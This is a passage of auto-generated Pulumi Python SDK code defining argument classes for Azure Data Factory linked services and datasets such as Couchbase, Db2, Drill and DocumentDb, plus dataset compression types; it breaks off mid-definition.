@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@pulumi.input_type
class CouchbaseLinkedServiceArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
connection_string: Optional[Any] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None):
"""
Couchbase server linked service.
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param Any connection_string: An ODBC connection string. Type: string, SecureString or AzureKeyVaultSecretReference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
"""
pulumi.set(__self__, "type", 'Couchbase')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if connection_string is not None:
pulumi.set(__self__, "connection_string", connection_string)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter(name="connectionString")
def connection_string(self) -> Optional[Any]:
"""
An ODBC connection string. Type: string, SecureString or AzureKeyVaultSecretReference.
"""
return pulumi.get(self, "connection_string")
@connection_string.setter
def connection_string(self, value: Optional[Any]):
pulumi.set(self, "connection_string", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@pulumi.input_type
class CouchbaseTableDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
Couchbase server dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'CouchbaseTable')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class CustomDataSourceLinkedServiceArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None):
"""
Custom linked service.
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
"""
pulumi.set(__self__, "type", 'CustomDataSource')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@pulumi.input_type
class CustomDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
The custom dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'CustomDataset')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class DatasetBZip2CompressionArgs:
def __init__(__self__, *,
type: pulumi.Input[str]):
"""
The BZip2 compression method used on a dataset.
:param pulumi.Input[str] type: Type of dataset compression.
"""
pulumi.set(__self__, "type", 'BZip2')
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset compression.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@pulumi.input_type
class DatasetDeflateCompressionArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
level: Optional[pulumi.Input[str]] = None):
"""
The Deflate compression method used on a dataset.
:param pulumi.Input[str] type: Type of dataset compression.
:param pulumi.Input[str] level: The Deflate compression level.
"""
pulumi.set(__self__, "type", 'Deflate')
if level is not None:
pulumi.set(__self__, "level", level)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset compression.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def level(self) -> Optional[pulumi.Input[str]]:
"""
The Deflate compression level.
"""
return pulumi.get(self, "level")
@level.setter
def level(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "level", value)
@pulumi.input_type
class DatasetGZipCompressionArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
level: Optional[pulumi.Input[str]] = None):
"""
The GZip compression method used on a dataset.
:param pulumi.Input[str] type: Type of dataset compression.
:param pulumi.Input[str] level: The GZip compression level.
"""
pulumi.set(__self__, "type", 'GZip')
if level is not None:
pulumi.set(__self__, "level", level)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset compression.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def level(self) -> Optional[pulumi.Input[str]]:
"""
The GZip compression level.
"""
return pulumi.get(self, "level")
@level.setter
def level(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "level", value)
@pulumi.input_type
class DatasetZipDeflateCompressionArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
level: Optional[pulumi.Input[str]] = None):
"""
The ZipDeflate compression method used on a dataset.
:param pulumi.Input[str] type: Type of dataset compression.
:param pulumi.Input[str] level: The ZipDeflate compression level.
"""
pulumi.set(__self__, "type", 'ZipDeflate')
if level is not None:
pulumi.set(__self__, "level", level)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset compression.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def level(self) -> Optional[pulumi.Input[str]]:
"""
The ZipDeflate compression level.
"""
return pulumi.get(self, "level")
@level.setter
def level(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "level", value)
@pulumi.input_type
class Db2LinkedServiceArgs:
def __init__(__self__, *,
database: Any,
server: Any,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
authentication_type: Optional[pulumi.Input[str]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
password: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
username: Optional[Any] = None):
"""
Linked service for DB2 data source.
:param Any database: Database name for connection. Type: string (or Expression with resultType string).
:param Any server: Server name for connection. Type: string (or Expression with resultType string).
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
        :param pulumi.Input[str] authentication_type: The authentication type to be used for the connection.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] password: Password for authentication.
:param Any username: Username for authentication. Type: string (or Expression with resultType string).
"""
pulumi.set(__self__, "database", database)
pulumi.set(__self__, "server", server)
pulumi.set(__self__, "type", 'Db2')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if authentication_type is not None:
pulumi.set(__self__, "authentication_type", authentication_type)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if password is not None:
pulumi.set(__self__, "password", password)
if username is not None:
pulumi.set(__self__, "username", username)
@property
@pulumi.getter
def database(self) -> Any:
"""
Database name for connection. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "database")
@database.setter
def database(self, value: Any):
pulumi.set(self, "database", value)
@property
@pulumi.getter
def server(self) -> Any:
"""
Server name for connection. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "server")
@server.setter
def server(self, value: Any):
pulumi.set(self, "server", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="authenticationType")
def authentication_type(self) -> Optional[pulumi.Input[str]]:
"""
        The authentication type to be used for the connection.
"""
return pulumi.get(self, "authentication_type")
@authentication_type.setter
def authentication_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "authentication_type", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
Password for authentication.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter
def username(self) -> Optional[Any]:
"""
Username for authentication. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: Optional[Any]):
pulumi.set(self, "username", value)
@pulumi.input_type
class DocumentDbCollectionDatasetArgs:
def __init__(__self__, *,
collection_name: Any,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
Microsoft Azure Document Database Collection dataset.
:param Any collection_name: Document Database collection name. Type: string (or Expression with resultType string).
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "collection_name", collection_name)
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'DocumentDbCollection')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="collectionName")
def collection_name(self) -> Any:
"""
Document Database collection name. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "collection_name")
@collection_name.setter
def collection_name(self, value: Any):
pulumi.set(self, "collection_name", value)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class DrillLinkedServiceArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
connection_string: Optional[Any] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None):
"""
Drill server linked service.
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param Any connection_string: An ODBC connection string. Type: string, SecureString or AzureKeyVaultSecretReference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
"""
pulumi.set(__self__, "type", 'Drill')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if connection_string is not None:
pulumi.set(__self__, "connection_string", connection_string)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter(name="connectionString")
def connection_string(self) -> Optional[Any]:
"""
An ODBC connection string. Type: string, SecureString or AzureKeyVaultSecretReference.
"""
return pulumi.get(self, "connection_string")
@connection_string.setter
def connection_string(self, value: Optional[Any]):
pulumi.set(self, "connection_string", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@pulumi.input_type
class DrillTableDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
Drill server dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'DrillTable')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class DynamicsEntityDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
entity_name: Optional[Any] = None,
